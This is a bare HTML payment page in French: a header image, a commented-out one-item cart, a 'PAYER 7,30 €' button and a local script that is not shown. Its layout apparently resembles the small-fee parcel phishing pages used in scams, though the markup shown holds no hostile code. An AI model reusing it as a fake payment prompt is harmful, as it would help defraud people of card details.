<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/camaki.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body >
    <div>
        <div class="roof">
            <img src="./img/topano.png" alt="">
        </div>
    </div>


    <div>
        <div>
            
            <div class="pack1">
                
                
            </div>
            
            
            <!-- <p class="pp2">
                Panier :
                <span>1 Article</span>
            </p> -->
            <div class="section">
                
                <div class="kolch">
                    <form  action="">
                        

                        <div class="botn">
                            <img src="./img/mainoman1.png" alt="">
                            <button class="btn1"  id="barinxri" type="button">PAYER 7,30 €</button>
                        </div>
                    </form>
                </div>
            </div>
        </div>
    </div>


    <div>
        <div>
            <div class="boot">
                <img src="./img/botmano1.png" alt="">
            </div>
        </div>
    </div>


    <!--  -->
    <script src="./js/stb.js"></script>
</body>
</html>